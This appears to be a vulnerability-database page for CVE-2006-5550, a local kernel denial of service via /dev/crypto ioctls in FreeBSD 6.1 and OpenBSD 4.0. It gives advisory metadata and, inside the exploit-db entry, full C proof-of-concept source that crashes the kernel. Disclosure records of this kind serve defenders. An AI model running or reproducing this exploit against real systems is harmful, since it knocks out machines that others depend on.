Search...

CVE-2006-5550

2006-10-26T13:07:00

ID CVE-2006-5550
Type cve
Reporter NVD
Modified 2008-09-05T17:12:33

Description

The kernel in FreeBSD 6.1 and OpenBSD 4.0 allows local users to cause a denial of service via unspecified vectors involving certain ioctl requests to /dev/crypto.

JSON Vulners Source

Initial Source

{"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5550", "history": [], "references": ["http://elegerov.blogspot.com/2006/10/here-is-lame-proof-of-concept-code-for.html", "http://www.securityfocus.com/bid/20713"], "lastseen": "2016-09-03T07:45:59", "bulletinFamily": "NVD", "title": "CVE-2006-5550", "cpe": ["cpe:/o:freebsd:freebsd:6.1:release_p10", "cpe:/o:freebsd:freebsd:6.1:stable", "cpe:/o:freebsd:freebsd:6.1:release", "cpe:/o:openbsd:openbsd:4.0"], "viewCount": 0, "id": "CVE-2006-5550", "hash": "9a0af583dbfa0ac33f5ee311c82d6a46ed92a0eb3cb4562e1dd58421bc524f46", "description": "The kernel in FreeBSD 6.1 and OpenBSD 4.0 allows local users to cause a denial of service via unspecified vectors involving certain ioctl requests to /dev/crypto.", "edition": 1, "assessment": {"name": "", "href": "", "system": ""}, "cvelist": ["CVE-2006-5550"], "scanner": [], "modified": "2008-09-05T17:12:33", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "objectVersion": "1.2", "reporter": "NVD", "type": "cve", "published": "2006-10-26T13:07:00", "enchantments": {"score": {"value": 2.1, "vector": "NONE", "modified": "2016-09-03T07:45:59"}, "vulnersScore": 2.1}}

{"osvdb": [{"lastseen": "2017-04-28T13:20:26", "references": [], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:22543](https://secuniaresearch.flexerasoftware.com/advisories/22543/)\nOther Advisory URL: http://elegerov.blogspot.com/2006/10/here-is-lame-proof-of-concept-code-for.html\n[CVE-2006-5550](https://vulners.com/cve/CVE-2006-5550)\nBugtraq ID: 20713\n", "reporter": "OSVDB", "published": "2006-10-25T13:48:55", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "title": "FreeBSD /dev/crypto ioctl Request Unspecified Local DoS", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-5550"], "modified": "2006-10-25T13:48:55", "href": "https://vulners.com/osvdb/OSVDB:30046", "id": "OSVDB:30046", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T16:43:07", "osvdbidlist": ["30046"], "references": [], "edition": 1, "description": "FreeBSD 6.1 (/dev/crypto) Local Kernel Denial of Service Exploit. CVE-2006-5550. Dos exploit for bsd platform", "reporter": "Evgeny Legerov", "published": "2006-10-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "type": "exploitdb", "title": "FreeBSD 6.1 /dev/crypto Local Kernel Denial of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5550"], "modified": "2006-10-24T00:00:00", "id": "EDB-ID:2639", "href": "https://www.exploit-db.com/exploits/2639/", "sourceData": "// Evgeny Legerov (elegerov.blogspot.com)\n\n#include unistd.h\n#include sys/types.h\n#include stdio.h\n#include fcntl.h\n#include crypto/cryptodev.h\n\nint main()\n{\n int fd2, fd;\n struct crypt_kop kop;\n\n printf(\"FreeBSD 6.1 /dev/crypto local kernel DoS\\n\");\n\n fd2 = open(\"/dev/crypto\", O_RDWR, 0);\n if (fd2 == -1){\n perror(\"open\");\n exit(-1);\n }\n\n if (ioctl(fd2, CRIOGET, &fd) == -1) {\n perror(\"ioctl\");\n exit(-1);\n }\n\n kop.crk_op = CRK_MOD_EXP;\n kop.crk_iparams = 3;\n kop.crk_oparams = 1;\n kop.crk_param[0].crp_nbits = 0x70000000;\n\n ioctl(fd, CIOCKEY, &kop);\n\n printf(\"exploit failed\\n\");\n\n return 0;\n}\n\n// milw0rm.com [2006-10-24]\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/2639/"}]}